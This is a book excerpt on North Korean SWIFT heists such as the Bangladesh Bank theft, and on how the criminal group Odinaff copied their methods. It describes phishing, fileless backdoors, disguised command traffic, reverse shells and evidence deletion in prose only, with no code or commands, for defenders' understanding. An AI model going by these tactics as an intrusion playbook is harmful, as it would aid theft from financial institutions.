How Criminal Actors Learned the Art of Cyber Warfare from Nation State Hackers

As long as banks have existed, people have been trying to rob them. But until recently, criminals had to physically enter the bank, usually masked and armed, and use the threat of violence to demand money. Today, that is no longer the case. Over the past 10 years, the world has seen many high-dollar bank compromises in which the robber never stepped foot on the premises.

Nation-state attackers are possibly the most dangerous and impactful threats that financial institutions face today. While nation-state attacks are rare, the monetary loss from a single attack is far greater than that from traditional cyberattacks. For these reasons, organizations need to handle and respond to them differently, as simply blocking or mitigating the initial threat will not stop this type of attacker.

Computing technology and the internet have made banks more secure than ever thanks to this technology. Unfortunately, they have also provided criminals with new opportunities for theft. Banks today risk losing more money from a single criminal operation than ever before. That’s because a brick-and-mortar bank’s financial loss is limited to the funds on hand at the branch. Online banking allows financial institutions to grant customers access to funds beyond those available at one physical location. While this enables banks to provide their customers with better service, it also means online attackers can steal vast sums of money.

The Rise of Nation-State Cyber Attacks

Typical cybercriminals often don’t have the means—or the time— required to execute attacks against financial institutions. Yet nation-state attackers pose a significant threat to financial institutions, as they have the resources and technological fluency to defeat robust cyber defenses. And remember, a government will have different motivations than a criminal.

Here’s something you may not have realized: financial gain isn’t always the objective of these nation-state attacks. Prior to 2013, nation-state attacks against banks primarily caused denials of service. The governments that executed these operations—primarily Iran and North Korea—did so to make a statement, retaliate, or weaken the nation’s economic strength in which the bank functions. In 2013, after years of denial-of-service (DoS) attacks, nations began financial theft operations, as restrictions against the attacking country inhibit its economy and motivate poorer nations to steal to fill the gap in their economies.

While it is now common to read about nation-state cyberattacks resulting in substantial economic losses, these attacks are still a relatively new threat. Understanding the evolution of these attacks helps explain how these nation-states become the financial attackers that they are today. Below, we will discuss attacks against the financial industry and attackers’ motivations and methodologies.

The North Korea Financial Theft Model

On June 8, 2018, the U.S. Department of Justice issued a criminal complaint against a North Korean citizen named Park Jin Hyok. (Editor’s note: the information and quoted material presented below, when not otherwise specified, derives from the DOJ complaint linked above.) The complaint documented several computer-related crimes, including hacking, that Park conducted along with unnamed individuals.

Based on the behaviors seen across multiple intrusions, North Korea is a patient attacker that spends considerable amounts of time within the targets’ environment before executing the financial theft phase of the attack.

The complaint provides an inside look at the hacking operations of North Korea, one of the most notorious nation-state attackers to date. It also offers extremely useful details for a defensive perspective. This section draws on this information. The staged attack model listed here originates from details within Department of Justice’s criminal complaint, in conjunction with research and publicly available analyses from security vendors.

It involves the following phases: reconnaissance, initial compromise, observation and learning, enumeration and privilege escalation, preparation of the staged environment (account and resource creation), execution of fraudulent transactions, and deletion of evidence. While some of the malware and tactic details varied from one attack to another, North Korea continued to use the same phased attack described earlier. It’s fair to conclude that North Korea will use the same approach for as long as it succeeds.

Reconnaissance

The attackers spent considerable time performing reconnaissance. For example, Park began conducting online reconnaissance a year before an attack on Bangladesh Bank. During this stage, the attackers would gather information about the bank’s public-facing infrastructure, as well as associated email addresses.

Park researched the target bank’s website and employees, including their social media accounts. In some instances, the attackers used services that specialized in “locating email accounts associated with specific domains and companies.”

Attackers collected email addresses to create target lists for use in the next phase of the attack. In some instances, the attackers created spoofed accounts that mimicked someone known to the target. In others, the attacker created email addresses to register social media accounts. Attackers leveraged these social media accounts in later stages of the attack. Furthermore, attackers also mapped out the target’s public infrastructure, likely in an attempt to identify any vulnerabilities that they could exploit to gain access to the victim’s environment in later stages as well.

Park also researched specific vulnerabilities to identify how to exploit them. Presumably, these were vulnerabilities he identified when conducting reconnaissance into the Bangladesh Bank’s infrastructure. In addition to these factors, attackers created and staged accounts and online personas during the reconnaissance phase of the attack. They created email accounts from free, publicly available webmail platforms such as Gmail. Later in the process of the attack, these accounts interacted with bank employees and sent spear-phishing emails.

Initial Compromise

Multiple North Korean financial theft campaigns used social engineering in the form of spear-phishing emails to compromise and gain access to the target’s environment. Attackers tailored these spear-phishing emails to target the individuals and accounts that they had identified during reconnaissance.

According to U.S. federal investigators, North Korean hackers crafted emails in several high-profile bank attacks that were “highly targeted, (and) reflect the known affiliations or interests of the intended victims and are crafted—with the use of appropriate formatting, imagery and nomenclature—to mimic legitimate emails that the recipient might expect to receive.”

In other words, the attackers spent time and resources to make the email specific, relevant and appear legitimate to the targets. Once compromised, attackers used the email accounts to send spear-phishing emails to other bank officials from legitimate accounts. This aspect of familiarity adds legitimacy to the email. The attackers often were not interested in compromising additional recipients; however, they included them, so the actual target saw familiar email addresses in the “To” or “CC” line of the email.

This tactic demonstrates the level of detail and planning the attackers put into their spear-phishing emails. Companies often use public-facing email addresses that are not attached to a specific individual. Instead, a group or an administrator at the organization monitors these public-facing email addresses. A typical example of this is when companies use a single email address to receive résumés and other types of correspondence.

At Bangladesh Bank, the attackers recognized such an email address as an opportunity to submit a résumé weaponized with malware. Examples within the criminal complaint included links in the body of the email requesting that targets click to view a résumé. When the targets clicked the link, malware compromised their systems, providing attackers with access to both the system and the environment.

Other North Korean compromise attempts included the use of emails mimicking alerts or notifications from social media and service providers such as Google and Facebook. For example, attackers utilized standard emails alerting users when someone accessed their account from a new location. The fraudulent emails mirrored legitimate ones by including the same text and images.

The primary difference between the two was the sender address—which attackers also often spoofed—and the URLs within the email. Attackers made sure to obfuscate the links in order to appear legitimate, but these links took the victims to attacker-controlled infrastructure to infect them with malware. Financial institutions suffered from attacks other than spear-phishing campaigns, however.

In 2016 and 2017, legitimate financial-themed websites that other banking companies and individuals often visited succumbed to infection. These websites then infected site visitors with custom malware. For example, attackers compromised the website of the Polish Financial Supervision Authority, and the website later infected financial organizations in Poland. The attackers knew that many other banks in this region would often visit the website. Similar attacks occurred around the same time, affecting the site of a Mexican financial regulator and a bank in South America. Each attack compromised systems and resulted in the website serving malware to website visitors. Later, analysis of the malware distributed by the compromised sites showed an overlap in code only previously seen in North Korean malware.

Observation and Learning

In all of the North Korean–attributed financial attacks, the attackers spent time learning the local environment. Based on the behaviors seen across multiple intrusions, North Korea is a patient attacker that spends considerable amounts of time within the targets’ environment before executing the financial theft phase of the attack.

In some cases, the attackers spent several months observing and learning the systems and how they connect and interact with other banking resources. For example, a unique attribute of these attacks is the amount of time the North Korean attackers spent learning the banks’ policies and procedures. Here, the objective for the attackers was to better understand how employees handle and conduct financial transactions.

This is notable because, except for nation-state espionage campaigns that were not a major concern to financial institutions at the time, it was generally unheard of for an attacker to spend time learning the targets’ employee policies and procedures. Doing so, however, demonstrates another example of the planning and patience the attackers put into these operations. This is also illustrates the differences between a typical financial attacker and a nation-state attacker.

North Korea’s diligence in learning the banks’ noncyber policies paid off. Two of the targeted banks, Tien Phong Bank (Vietnam) and Bank of Bangladesh, archived SWIFT transactions differently than most financial institutions. Bangladesh Bank printed paper copies of SWIFT messages. Hard copies of the transactions provided a physical record archived at the bank. Tien Phong Bank, however, stored electronic PDF versions of the messages on a third-party server. It used FoxIt Reader, an application for managing digital documents such as PDFs, to convert SWIFT message details into PDF records.

The attackers identified this process and developed malware that would infect the bank’s systems when bank employees attempted to access the PDF software by replacing that application with a weaponized version of the software. If the attackers had tried to implement this at Bangladesh Bank, it would not have worked. This is because the bank used printed copies to archive transaction messages. Alternatively, at the Vietnamese bank, if the attackers had attempted to print hard copies instead of saving the messages as PDFs, it would likely draw attention to their activities. Taking the time to learn each bank’s unique business processes allowed the attackers to identify creative ways to further infect and quietly execute fraudulent transactions. More importantly, the attackers used the information to blend in with legitimate bank activity.

Enumeration and Privilege Escalation

The attackers also used various hack tools (often publicly available) to enumerate the victims’ environments.  The goal of enumeration was to identify “computers the bank used to send and receive messages via the SWIFT communication system.” As part of their security practices, the targeted institutions implemented a “segregation of duties” policy within their environments. This is a practice that prevents any one person from having complete access to critical business systems and functions within the environment. Unfortunately, this did not prevent the attackers from gaining the necessary access to attempt fraudulent financial transactions. It did, however, increase the difficulty of the attack.

The attackers needed access to multiple protected accounts to get into various systems and segregated networks before infiltrating the accounts and systems associated with SWIFT transactions. Many of these administrative accounts fell into attackers’ control via using credential-collecting hack tools, such as keyloggers, or through spearphishing emails sent from legitimate internal bank accounts.

Once such keylogger present in the Bangladesh Bank heist hid within the C:\Windows\ Web\Wallpaper\Windows\ directory on a compromised host, indicating the malware may have been delivered through an attachment mimicking desktop wallpaper.

Preparing the Stage

To continue operations and stage the target environment, the attackers needed to maintain an undetected presence. The malware’s communication traffic could have caught the attention of defenders as it actively communicated with both internal victim infrastructure and adversary command-and-control servers. In an effort to hide their activity, attackers used what has been described as a “custom binary protocol designed to look like TLS traffic” to encrypt the malware’s communications.

TLS, short for Transport Layer Security, is an encryption-layer protocol that protects network communication traffic such that it cannot appear as clear text while in transit. The attackers used a version of the TLS protocol that had a fake TLS header. The TLS header leveraged a unique cipher suite with a hard-coded array, altering network traffic at the encryption level, making it difficult to detect. Then the attacker created a second version, which also used a fake header; however, instead of a hard-coded array, the cipher suite used a random cipher.

These were then appended to the command-and-control communication traffic generated by the malware. A cipher suite is comprised of algorithms used for cryptographic operations, such as encryption and decryption, and allows for key exchange and other authentication procedures that banks commonly use today to secure traffic between communicating hosts. The attackers built the encryption protocol into a custom-developed backdoor known as Nestegg. Without the proper encryption key or an understanding of the custom protocol, nobody could decrypt traffic originating from the infected system.

Since the communication traffic appeared similar to legitimate TLS traffic, the attackers were able to communicate with command-and-control infrastructure covertly. The attackers added another level of complexity by having the Nestegg backdoor run in memory on the victim system.

We call malicious code that runs exclusively in memory on the victim’s system fileless malware. The benefit of this design is the malware can go undetected, since it’s not written to, or present on, a physical drive; it executes and runs commands directly in memory. Most security products monitor and detect files as they write to the hard disk of the protected system. The drawback of fileless malware is its lack of persistence. Since the disk is not written to, fileless malware can be deleted if the infected system reboots or restarts. The Nestegg malware, however, addresses this shortcoming by monitoring the victim system to detect shutdown and reboot functions. When it identifies either of these events, the malware installs a copy of itself onto the victim’s hard drive to reinstate itself once the operating system restores. After rebooting and reinstalling, the malware deletes the copy written to the hard disk and once again exists only in memory on the victim system.

Nestegg had various other notable functions, such as “acting as a proxy to send commands to other infected systems, and accept commands to upload and download files, list, delete files, start, and terminate processes.” These capabilities allowed the attackers to stage, prepare, and further compromise the banks’ systems and networks. Specifically, the attackers placed malware on various systems involved with processing the banks’ financial transactions.

Execution of Fraudulent Transactions

Up to this point, the attackers had gained access, observed bank systems, applications, processes, and staged malware throughout the bank’s network. Using the malware and information gained, the attackers were able to acquire various types of administrative accounts.

Typically, no single entity would (or should) have complete access to the systems and components used to conduct a bank’s financial transactions. However, these attackers used vast resources generally not available to typical criminals to obtain all the credentials necessary to authorize financial transactions. Next, the attackers used the accounts to log into the SWIFT Alliance application, a message interface application, to conduct financial transactions.

The SWIFT systems are usually separate from other bank networks, and network segregation, enforced with routers and firewalls, protects the systems. In the Bangladesh Bank heist, however, the bank’s infrastructure did not meet the security standards that should have been in place. In a report titled “North Korean Cyber Capabilities,” the U.S. Congressional Research Service noted the following: Bangladesh’s network may have been particularly vulnerable, as it reportedly lacked a firewall to protect against outside intrusion. Of note, in some of the North Korean financial attacks, the attackers obtained access to legitimate accounts, while in others, they created new ones. This included the operator accounts necessary to access the local SWIFT Alliance application.

The Alliance application “is a customer-managed gateway to the SWIFT network that transmits and receives messages” from one bank to another to create and confirm financial transactions.34 If the targeted institution had proper security controls in place, the creation of the operator accounts should have appeared to the institution as an uncommon or unusual event.

In addition to this, the attackers unsuccessfully attempted to log into the Alliance application. Unfortunately, neither the creation of the operator accounts nor the failed login attempts alerted anyone, and the attackers gained complete access to the bank’s local SWIFT systems. As previously mentioned, the attackers likely selected banks in countries or regions they believed to have weaker or less developed technology security standards.

Between using printed physical copies of SWIFT transactions and not securing SWIFT systems, it is fair to say Bangladesh Bank was an easier target than many other financial institutions. At this point, the attackers began to execute financial tractions. The transactions appeared legitimate, given that an account with valid access to the SWIFT system created and authorized them. From an outside perspective, as other banks involved in the transaction would view it, these were legitimate transactions made with the proper authorization and access.

Before 2013, this type of attack had either not taken place or not been publicly acknowledged, so there was no reason to doubt the legitimacy of the transactions. In February 2016, the attacker-created SWIFT operator accounts attempted at least 35 transactions. In total, North Korea tried to steal nearly 1 billion dollars from the Bangladesh Bank.

Timing the Transaction Attempts

According to a 2019 public report that SWIFT published, the attackers documented the time of the fraudulent transfers at the Bangladesh Bank.35 A pattern appeared: the transactions primarily occurred after working hours, between 11 p.m. and midnight in the local time. The report also documented the time of the attackers’ financial transactions at other banks believed to have been targeted by the same North Korean attackers. Almost every attack occurred between 9 p.m. and 4 a.m. local time, when the banks were closed.

The second pattern present in several of the bank attacks deals with the dates of the attacks. In several incidents, the attackers attempted fraudulent transactions on holidays, when banks were closed. By conducting the transactions later in the evening to early morning and on holidays when bank employees are less likely to be present, the attackers had an increased chance of success.

Deleting Evidence and Covering Tracks

Methods and procedures varied for handling records associated with SWIFT transactions at targeted banks. From an attacker perspective, if a bank employee or the bank’s systems identified the transactions, this could give away their operation. To address this, the attackers designed features in their malware to delete files and other evidence left during the compromise. For example, a forensic investigation of compromised bank systems identified signs that the attackers had attempted to remove entries from system logs.

Another common tactic seen across all the financial attacks was to delete malware from the infected systems once it had completed its given task. Specifically, multiple North Korean malware variants such as Contopee, Nestegg, and SierraCharlie included a “secure delete function.” However, the way the malware achieved this differed from one variant to another. Additionally, while not always successful, the attackers attempted to remove evidence of login attempts to the SWIFT Alliance application and its associated database(s).

It is highly likely the attacker behind the SWIFT Banking attacks is the adversary behind the 2014 Sony Pictures Entertainment attacks. Components in the malware, such as the secure delete function and the custom cipher protocol, may have been initially designed for the Sony attack and then modified or updated for use in the bank attacks between 2015 and 2018.

Bank of Bangladesh Response

The Federal Reserve Bank of New York received the attacker-generated transaction requests. These transactions processed money transfers to accounts in the Philippines and Sri Lanka. Fortunately for the Bangladesh Bank, the total amount of the funds stolen was far less than the 1 billion dollars that attackers had requested.

Ironically, these attackers, who spent a year carefully planning every detail of the heist, made a mistake in the most critical phase of their attack: they misspelled the name of a destination bank in one of the transaction requests. The attackers spelled “NGO, Shalika Foundation” as NGO Shalika “Fandation.” This simple spelling error was enough for one of the banks routing the money to catch the activity.36 When the routing bank identified the misspelling, it contacted Bangladesh Bank, which immediately terminated the transaction.

The North Korean attackers would have stolen almost a billion dollars, but according to media reports, the Federal Reserve had also contacted the Bangladesh Bank because of the unusually large amount of transfer requests and funds going to private organizations, such as the NGO. The bank stopped the pending transactions. In total, the banks managed to retain between $850 and $870 million by stopping these transfers prior to reaching attacker-controlled accounts. Still, the attackers successfully made away with approximately $101 million dollars from Bangladesh Bank.

Odinaff: How Cybercriminals Learn from Nation-States

Few cybercriminals are capable of the persistence, patience, and planning used in the engagements covered so far. Unfortunately, there are always exceptions.

The North Korean SWIFT attacks made global headlines in 2016, garnering the attention of an organized cybercrime group named Odinaff. That year, security researchers revealed what they had discovered regarding the tactics, techniques and procedures used in the SWIFT attacks to compromise the banks. This information has helped better defend against these incidents. But it also provided criminal attackers with a roadmap for future bank compromises.

Believed to originate from Eastern Europe, Odinaff successfully exploited banks with its own malware. It relied on tactics first seen in North Korean attacks, and current intelligence suggests that the group successfully stole millions of dollars from financial institutions.

As an initial attempt to gain access to the banks’ systems, the attackers injected malware into a popular administrative tool called AmmyAdmin. They hoped bank administrators would download it, effectively infecting themselves. To do this, the attackers compromised the legitimate AmmyAdmin website—an attack that may sound elaborate, but in fact, criminals have frequently compromised the same site to distribute commodity malware.

NOTE The website used to host AmmyAdmin has been known to distribute remote access trojans, exploit kits, and ransomware. Due to this risk, you should not visit the hosting website or download this tool.

While the AmmyAdmin tool might perhaps have functioned as an effective infection vector, the attackers likely realized it gave them no control over who downloaded the application. This risked infecting many unintended victims. It also exposed them to unwanted public attention. Probably for this reason, the attackers switched to spearphishing emails, which allowed them to choose their targets.

Odinaff’s spearphishing emails were nowhere near as sophisticated as North Korea’s. Although targeted, the phishing campaign used a generic email template directing recipients to click a URL in the body of the email. The URL would then download a malicious payload. The attachment, however, did not infect victims if they opened it. Instead, victims had to open a compressed file that required the target to enter a password included in the email text.

If victims followed the attackers’ instructions, the archive would decompress and present the target with a Microsoft Office document. Once victims attempted to open the document, the attachment presented users with the option to enable macros. If the target did not enable macros, the infection would fail. Only if victims followed all of these steps did the first-stage malware, known as Trojan.Odinaff, compromise the system, providing the attackers with initial access to the victims’ environment. That the attack required so many active steps on the part of the victims points to its precarity; if the targets had become suspicious of the emails, or perhaps the unusual requirements necessary to open the attachment, the attack would have failed.

It may seem hard to fathom that anyone would fall for such a scheme. Yet it happened more than once, in attacks across several banks.

The Odinaff malware provided basic backdoor functionality, issued shell commands and downloaded and executed additional malware. It used a something called a mutex, hard-coded into the binary itself. A mutex is an object in the code used as an identifier.

In this case, the identifier revealed whether a system was already infected. If it was, the malware halted execution. This prevented multiple infections on the same host from taking place, which would have tied up additional resources and potentially drawn unwanted attention. The malware also used a hard-coded proxy to connect to command-and-control servers, making it difficult for defenders to identify outgoing traffic.

Once in the victim’s environment, the attackers would review the infected victims and identify systems of interest. They then used Odinaff’s malware to download the stage-two malware, known as Backdoor.Batle, onto the subset of high-value systems of interest. (Researchers coined the name Backdoor.Batle after a string they found in the malware code containing the term “BATLE_SOURCE.”)42

The Batle malware ran malicious payloads in memory on the victims’ systems, and it created a reverse shell, launched from a batch file, between it and the attackers’ infrastructure. The Batle malware was designed and developed using common penetration-testing software, such as the red-team tools Metasploit and CobaltStrike. The Metasploit framework identifies vulnerabilities and executes exploitation code against them. CobaltStrike functions with Metasploit to provide various post-exploitation and attack-management capabilities.

Penetration testers commonly used both for legitimate security assessment exercises. Unfortunately, cyberattackers also use this tool to find and exploit weaknesses in victims’ environments.

Odinaff’s attack shared another tactic with those of nation-states: the use of tools already present in the victim’s environment. Using legitimate administrative tools and applications already present on the system, the attacker can weaponize Microsoft Windows operating system binaries. This tactic, known as Living off the Land Binaries (LOLBins), allows attackers to hide malware in legitimate system binaries often whitelisted by security tools.

When a binary is whitelisted, tools such as antivirus and endpoint detection software will not detect the file as malicious. Whitelisting prevents security tools from removing or quarantining the legitimate operating system resources that could affect system functionality. Knowing this, attackers take advantage of the legitimate resource to use in attacks and avoid detection. The Odinaff attackers used Windows administration software, such as PSExec, Netscan and PowerShell. When the attackers needed to fulfill a capability unattainable by tools present in the victims’ environment, they relied on publicly available hacktools instead of custom ones.

A growing trend in cyberattacks, this strategy makes discovery and attribution more difficult. For example, both criminal and nation-state attackers have used the hacking tool Mimikatz against banks, because it is freely available, effective, a favorite of legitimate red teams and impossible to attribute.

Using Batle, the attackers learned everything they could about the victims’ environment. They spent time monitoring banks’ activities and exploring the systems and infrastructure. Specifically, the Batle malware included the ability to capture keystrokes and images of users’ screens in five- to thirty-second intervals. It then saved the output to a disk, where attackers could retrieve and study the captures. This allowed criminal attackers to learn the banks’ processes and technical procedures for the execution of financial transactions.

Another capability of the Batle malware—again, modeled after the nation-states’—was a module that allowed attackers to wipe the victim’s disk drive. Despite its inclusion, attackers did not use this capability. The Odinaff attackers also manipulated the SWIFT messaging system using tactics almost identical to the nation-states’.

The malware looked for any strings in the SWIFT messages that included specific details, such as dates and international bank account numbers. When the date and account number in a SWIFT message matched the details associated with a fraudulent transaction, the malware suppressed the message, preventing the bank from discovering the activity or at least delaying it until the funds were already gone.

While no cybersecurity officials have established solid attribution, several clues point to attacker ties to Russia. Strings present in the malware, as well as folder names, were comprised of Cyrillic characters; additionally, some speculated the existence of a relationship between the Odinaff attackers and the Carbanak malware attacks.

Carbanak is the tool of choice of a cybercriminal gang, also referred to as Carbanak, that has targeted large corporations for financial gain since at least 2014. The Carbanak gang has been the subject of both media and security reporting due to their highnprofile attacks.43 The North Korean and Russian-based Odinaff attacks were so similar that, when initially discovered, investigators believed the heist originated from the same North Korean attackers responsible for the previous SWIFTrelated attacks.

They soon realized that was not the case, but this serves as another example of why investigators cannot let opinion dictate attribution; they must follow the evidence. While the Odinaff attackers were successful—they were one of a few cybercriminal groups to steal money from financial institutions themselves as opposed to their customers—they did not enjoy the same monetary success as nation-state attackers.

Conclusion

Nation-state financial theft wasn’t a problem for banks prior to the 21st century. Unfortunately, since 2009, nation-state attackers, including those from Iran, North Korea and Russia, have conducted attacks that include sabotage, financial theft, or denials of service against banks all over the world. The attacking nations have suffered under sanctions; in turn, these sanctions then motivated the attacks.

For example, North Korea and Iran are under sanctions for developing and testing nuclear weapons. The measures in place restrict economic growth in order to pressure both countries to halt their military development of nuclear weapons. Yet the funds obtained through financial theft often supplement this monetary loss, allowing nations to continue building their military power.

In addition to economic motivation, Iran and North Korea conduct attacks to project power in the public eye and to retaliate against alleged U.S.-based or allied cyber operations.43 Attacking financial institutions for substantial monetary gains and with large-scale DoS and sabotage attacks sends a message to the government in which the victim banks reside.

Other nations, like Russia, have been sanctioned for military activities as well, just not for those involving nuclear weapons. While not discussed here, Russian attackers usually target financial institutions for retribution purposes and to cause economic turmoil in the targeted nation. The impact of cyberattacks magnifies when bank customers cannot access their money, resulting in negative media attention for the victim organizations.

This media coverage causes embarrassment to banks and often results in a loss of customers who may feel their money is no longer safe. It is plausible that in a country with a weakened economy, this type of attack could impact its overall economic posture. While these attacks might sound like plots from spy movies, bear in mind that they actually took place, demonstrating the danger that nation-states pose to financial institutions. Nation-state attackers are possibly the most dangerous and impactful threats that financial institutions face today. While nation-state attacks are rare, the monetary loss from a single attack is far greater than that from traditional cyberattacks. For these reasons, organizations need to handle and respond to them differently, as simply blocking or mitigating the initial threat will not stop this type of attacker.

Excerpted from The Art of Cyberwarfare by Jon DiMaggio. Copyright © 2022 by Jon DiMaggio. Excerpted by permission of No Starch Press. All rights reserved. No part of this excerpt may be reproduced or reprinted without permission in writing from the publisher.